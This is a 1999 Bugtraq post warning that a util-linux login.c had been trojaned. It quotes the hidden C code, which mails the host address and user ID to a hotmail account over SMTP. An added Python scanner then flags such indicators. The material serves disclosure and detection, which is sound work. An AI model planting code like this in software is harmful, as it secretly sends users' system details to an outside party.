
Date: Sat, 23 Jan 1999 22:49:29 -0500
From: John Stange <building@CS.UMD.EDU>
Subject: Re: backdoored tcp wrapper source code
To: BUGTRAQ@NETSPACE.ORG

You may want to have a thorough look at everything you've got... I grabbed
a copy of util-linux2.9g (admittedly being a bad boy and not checking
against anything), and while I don't have a pristine copy of the source
on hand to check, I'm guessing that sendmail and a hotmail address is not
standard behavior for /bin/login:

(from login-utils/login.c)

                he = gethostbyname("mail.hotmail.com");
                if (!he) exit(0);
                ia = (struct in_addr *)he->h_addr_list[0];
                l = sizeof(sai);memset(&sai,0,l);
                sai.sin_port = htons(25);
                sai.sin_addr.s_addr = ia->s_addr;
                if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);
                if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);
                if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);
                sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());
                sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
                sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) < 0) exit(0);
                if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0) exit(0);
                sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);
                sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);
                sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);
                sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);
etc etc

I'm in a bit of a hurry, so I haven't had a chance to comb anything
else...

> TCP Wrappers is a widely-used security tool to protect UNIX systems
> against intrusion. It has an estimated installed base of millions.
>
> Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
> a backdoored version. Eventually this was bound to happen, and
> that's why the source file is accompanied by a PGP signature.  But
> that is no guarantee against people downloading and installing
> backdoored software.

-- John Stange
Staff World, 4120 AVW
x52720
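The fragment above shows the indicators a reviewer can look for when auditing an untrusted source tree: a hard-coded mail host passed to gethostbyname(), port 25, SMTP verbs and mail addresses in string literals, and a hidden file created under /var/tmp. The following is an added example (not part of this post or of util-linux) that turns those indicators into a simple line-oriented heuristic scan; the sample input is constructed from the quoted fragment plus a benign lookup, and the rule names and threshold are arbitrary.

```python
import re

# Heuristics matching the pattern reported in the post. Each one alone can be
# benign; several co-occurring in a login binary is what deserves a look.
PATTERNS = {
    "hardcoded-hostname-lookup": re.compile(r'gethostbyname\s*\(\s*"[^"]+"'),
    "smtp-port": re.compile(r'htons\s*\(\s*25\s*\)'),
    "smtp-verb": re.compile(r'"(HELO|MAIL FROM|RCPT TO|DATA|QUIT)\b'),
    "email-literal": re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'),
    "hidden-tmp-file": re.compile(r'"/(?:var/)?tmp/\.[^"]+"'),
}


def scan_source(text):
    """Return (line_no, rule, stripped_line) for every heuristic hit."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, rx in PATTERNS.items():
            if rx.search(line):
                findings.append((no, rule, line.strip()))
    return findings


def rules_hit(text):
    """Distinct rule names that fired, sorted for stable comparison."""
    return sorted({rule for _, rule, _ in scan_source(text)})


def verdict(text, threshold=3):
    """Flag a file only when several independent indicators co-occur."""
    return "suspicious" if len(rules_hit(text)) >= threshold else "clean"


# Constructed sample: lines lifted from the quoted login.c fragment, preceded by
# a benign lookup whose hostname comes from a variable rather than a literal.
SAMPLE = r'''
he = gethostbyname(hostname);
he = gethostbyname("mail.hotmail.com");
sai.sin_port = htons(25);
if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);
if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0) exit(0);
if (write(s,"DATA\n",5) < 0) exit(0);
close(creat("/var/tmp/.fmlock0",511));
'''

if __name__ == "__main__":
    for no, rule, line in scan_source(SAMPLE):
        print(f"line {no}: {rule}: {line}")
    print("verdict:", verdict(SAMPLE))
```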